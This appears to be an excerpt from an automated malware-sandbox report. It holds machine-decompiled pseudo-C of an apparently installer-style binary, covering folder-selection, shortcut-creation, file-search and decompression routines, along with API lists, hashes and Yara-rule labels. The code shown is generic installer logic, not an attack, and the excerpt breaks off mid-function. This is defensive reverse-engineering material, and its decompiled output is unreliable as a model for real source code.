                                                0x00404830
                                                0x00404833
                                                0x00404833
                                                0x00404839
                                                0x0040483f
                                                0x00404842
                                                0x00404848
                                                0x00404849
                                                0x0040484e
                                                0x00404857
                                                0x0040485e
                                                0x00404861
                                                0x00404864
                                                0x00404867
                                                0x004048a3
                                                0x004048cc
                                                0x004048a5
                                                0x004048b2
                                                0x004048b2
                                                0x00404869
                                                0x0040486c
                                                0x0040487b
                                                0x00404885
                                                0x0040488d
                                                0x00404894
                                                0x0040489c
                                                0x0040489c
                                                0x00404867
                                                0x004048d2
                                                0x004048d3
                                                0x004048df
                                                0x004048df
                                                0x004048ec
                                                0x00404907
                                                0x0040490b
                                                0x00404928
                                                0x0040492d
                                                0x00404930
                                                0x00000000
                                                0x0040490d
                                                0x00404912
                                                0x0040491b
                                                0x00404ca8
                                                0x00404cba
                                                0x00404cba
                                                0x0040490b
                                                0x00000000
                                                0x004048ec
                                                0x00404824

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 492e76265ab7cc4ed03b52ac64fc1ec799b063a37a97735f7d713d4af27fae02
                                                • Instruction ID: a703f14ce3faa2e4f8142ea310930ebcb38104dd784f52016b44af4a551de8a9
                                                • Opcode Fuzzy Hash: 492e76265ab7cc4ed03b52ac64fc1ec799b063a37a97735f7d713d4af27fae02
                                                • Instruction Fuzzy Hash: B602AFB0E00209AFDB21DF54CC45AAE7BB5FB84314F10817AF610BA2E1C7799A52CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404201, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E00404201(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				intOrPtr _t136;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x42a078;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052BF(0x3fb, _t151);
					E00405C17(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052BF(0x3fb, _t151);
							if(E004055C8(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059DB(0x429870, _t151);
							_t80 = E0040557B(0x429870);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CEE("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x429870,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x429870);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E00404616(5)) {
									_v8 = 2;
								}
								_t136 =  *0x42ebfc; // 0x5bda93
								if( *((intOrPtr*)(_t136 + 0x10)) != 0) {
									E00404561(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x429860);
									} else {
										E00404561(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x42f4c4 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DE5(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42a890 == 0) {
									E00404196();
								}
								 *0x42a890 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x42a8a0;
							_v76 = _a4;
							_v68 = 0x42a8a0;
							_v56 = E004044FB;
							_v52 = _t151;
							_v64 = E004059FD(0x3fb, 0x42a8a0, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x429c78, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E00405238(0, _t110);
								E004054E8(_t151);
								_t114 =  *((intOrPtr*)( *0x42f428 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059FD(0x3fb, 0x42a8a0, _t151);
									_t144 = 0x42e3c0;
									if(lstrcmpiA(0x42e3c0, 0x42a8a0) != 0) {
										lstrcatA(_t151, 0x42e3c0);
									}
								}
								 *0x42a890 =  *0x42a890 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405554(_t151) != 0 && E0040557B(_t151) == 0) {
						E004054E8(_t151);
					}
					 *0x42ebf8 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DC3(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DC3(_a4);
					E00403DF8(_t144);
					_t128 = E00405CEE("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E2A(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}





































                                                0x00404207
                                                0x0040420e
                                                0x0040421a
                                                0x00404228
                                                0x00404230
                                                0x00404234
                                                0x0040423a
                                                0x0040423a
                                                0x00404246
                                                0x004042c0
                                                0x004042c7
                                                0x00404393
                                                0x0040439a
                                                0x004043a9
                                                0x004043a9
                                                0x004043ad
                                                0x004043b3
                                                0x004043b6
                                                0x004043c3
                                                0x004043c5
                                                0x004043c5
                                                0x004043d3
                                                0x004043d9
                                                0x004043e0
                                                0x004043e2
                                                0x004043e2
                                                0x004043ef
                                                0x004043fb
                                                0x0040441f
                                                0x00404430
                                                0x00404436
                                                0x00404438
                                                0x00000000
                                                0x00000000
                                                0x0040443e
                                                0x0040443e
                                                0x0040444c
                                                0x00000000
                                                0x004043fd
                                                0x00404400
                                                0x00404404
                                                0x00404408
                                                0x00404409
                                                0x0040440e
                                                0x00000000
                                                0x00000000
                                                0x00404416
                                                0x0040444e
                                                0x0040444e
                                                0x00404455
                                                0x0040445e
                                                0x00404460
                                                0x00404460
                                                0x00404467
                                                0x00404472
                                                0x0040447c
                                                0x00404484
                                                0x0040449a
                                                0x00404486
                                                0x0040448a
                                                0x0040448a
                                                0x00404484
                                                0x0040449f
                                                0x004044a4
                                                0x004044a9
                                                0x004044b2
                                                0x004044b2
                                                0x004044bb
                                                0x004044bd
                                                0x004044bd
                                                0x004044c9
                                                0x004044d1
                                                0x004044db
                                                0x004044db
                                                0x004044e0
                                                0x00000000
                                                0x004044e0
                                                0x004043fb
                                                0x0040439c
                                                0x004043a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004043a3
                                                0x004042cd
                                                0x004042d3
                                                0x004042ed
                                                0x004042f2
                                                0x004042fc
                                                0x00404303
                                                0x00404308
                                                0x00404312
                                                0x00404315
                                                0x00404318
                                                0x0040431f
                                                0x00404327
                                                0x0040432a
                                                0x0040432e
                                                0x00404335
                                                0x0040433d
                                                0x0040438c
                                                0x0040433f
                                                0x00404340
                                                0x00404346
                                                0x00404350
                                                0x00404358
                                                0x0040435a
                                                0x0040435b
                                                0x0040435d
                                                0x00404363
                                                0x00404371
                                                0x00404375
                                                0x00404375
                                                0x00404371
                                                0x0040437a
                                                0x00404385
                                                0x00404385
                                                0x0040433d
                                                0x00000000
                                                0x004042f2
                                                0x004042e0
                                                0x00000000
                                                0x00000000
                                                0x004042e6
                                                0x00000000
                                                0x00404248
                                                0x00404253
                                                0x0040425c
                                                0x00404269
                                                0x00404269
                                                0x00404273
                                                0x00404278
                                                0x00404281
                                                0x00404284
                                                0x00404289
                                                0x00404291
                                                0x00404294
                                                0x00404299
                                                0x0040429f
                                                0x004042ae
                                                0x004042b5
                                                0x004044e6
                                                0x004044f8
                                                0x004044f8
                                                0x004042be
                                                0x00000000
                                                0x004042be

                                                APIs
                                                • GetDlgItem.USER32 ref: 0040424C
                                                • SetWindowTextA.USER32(00000000,?), ref: 00404278
                                                • SHBrowseForFolderA.SHELL32(?,00429C78,?), ref: 00404335
                                                • lstrcmpiA.KERNEL32(YVfgfgfgfgfg,0042A8A0,00000000,?,?,00000000), ref: 00404369
                                                • lstrcatA.KERNEL32(?,YVfgfgfgfgfg), ref: 00404375
                                                • SetDlgItemTextA.USER32 ref: 00404385
                                                  • Part of subcall function 004052BF: GetDlgItemTextA.USER32 ref: 004052D2
                                                  • Part of subcall function 00405C17: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
                                                  • Part of subcall function 00405C17: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
                                                  • Part of subcall function 00405C17: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
                                                  • Part of subcall function 00405C17: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91
                                                • GetDiskFreeSpaceA.KERNEL32(00429870,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,00429870,00429870,?,?,000003FB,?), ref: 00404430
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404446
                                                • SetDlgItemTextA.USER32 ref: 0040449A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$SHAutoComplete$YVfgfgfgfgfg$shlwapi.dll
                                                • API String ID: 2007447535-2664549111
                                                • Opcode ID: 13ec250f15324b4634fface7d90eecd4de00bc56d5a8f4a37550fa7532b8bb5e
                                                • Instruction ID: f206f0ffef5a04671e447d0e91c878c3daa73ba4eb39f4f1c2dae132269ab5a2
                                                • Opcode Fuzzy Hash: 13ec250f15324b4634fface7d90eecd4de00bc56d5a8f4a37550fa7532b8bb5e
                                                • Instruction Fuzzy Hash: 508180B1A00218ABDB11EFA2CD45B9F7AB8EF44354F10417BFA04B62D1D77C9A418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405554(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407430, _t75, 1, 0x407420, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407440, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409440 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409440, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409440, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                0x004020af
                                                0x004020b9
                                                0x004020c2
                                                0x004020cc
                                                0x004020d5
                                                0x004020df
                                                0x004020e3
                                                0x004020e3
                                                0x004020e8
                                                0x004020f9
                                                0x00402101
                                                0x004021df
                                                0x004021df
                                                0x004021e6
                                                0x00402107
                                                0x00402107
                                                0x00402118
                                                0x0040211c
                                                0x00402122
                                                0x0040212c
                                                0x0040212e
                                                0x00402139
                                                0x0040213c
                                                0x00402149
                                                0x0040214b
                                                0x0040214d
                                                0x00402154
                                                0x00402157
                                                0x00402157
                                                0x0040215a
                                                0x00402164
                                                0x0040216c
                                                0x00402171
                                                0x0040217d
                                                0x0040217d
                                                0x00402180
                                                0x00402189
                                                0x0040218c
                                                0x00402195
                                                0x0040219a
                                                0x004021ac
                                                0x004021b5
                                                0x004021bb
                                                0x004021c7
                                                0x004021c7
                                                0x004021c9
                                                0x004021cf
                                                0x004021cf
                                                0x004021d2
                                                0x004021d8
                                                0x004021dd
                                                0x004021f2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004021dd
                                                0x004021e8
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • CoCreateInstance.OLE32(00407430,?,00000001,00407420,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409440,00000400,?,00000001,00407420,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 123533781-1943935188
                                                • Opcode ID: 1efab7b31b85456446010618f0c6c7c3e14bd9a467c8a1600499b323e27bc476
                                                • Instruction ID: 4df27e177d60a4ea751ebd20e87b2fb7c9e865850ddb53f1d7743bd9643c1b3c
                                                • Opcode Fuzzy Hash: 1efab7b31b85456446010618f0c6c7c3e14bd9a467c8a1600499b323e27bc476
                                                • Instruction Fuzzy Hash: 5A415D75A00215AFCB00DFA4CD88E9E7BB6FF48319B20416AF905EB2E1CA759D41CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 39%
                                                			E004026BC(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405939(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059DB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                0x004026d4
                                                0x004026e8
                                                0x004026f3
                                                0x004026f4
                                                0x00402855
                                                0x004026d6
                                                0x004026d6
                                                0x004026d8
                                                0x004026da
                                                0x004026da
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 82b4643f9ce3c08722843be4bc63fbbd9fe595e1c0db63a2643e9360637e4537
                                                • Instruction ID: 9601d7ef4499486e177952c5a453970aa3bd803740f53fde15c253ab4d2be1f5
                                                • Opcode Fuzzy Hash: 82b4643f9ce3c08722843be4bc63fbbd9fe595e1c0db63a2643e9360637e4537
                                                • Instruction Fuzzy Hash: D5F0A0B2608110DFDB01EBA49E49AEEB778DF21324F60017BE141B20C1D6B84A499B3A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004060D9, Relevance: .3, Instructions: 334COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E004060D9(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406848( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407314; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407314; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E004068B0( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406808))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
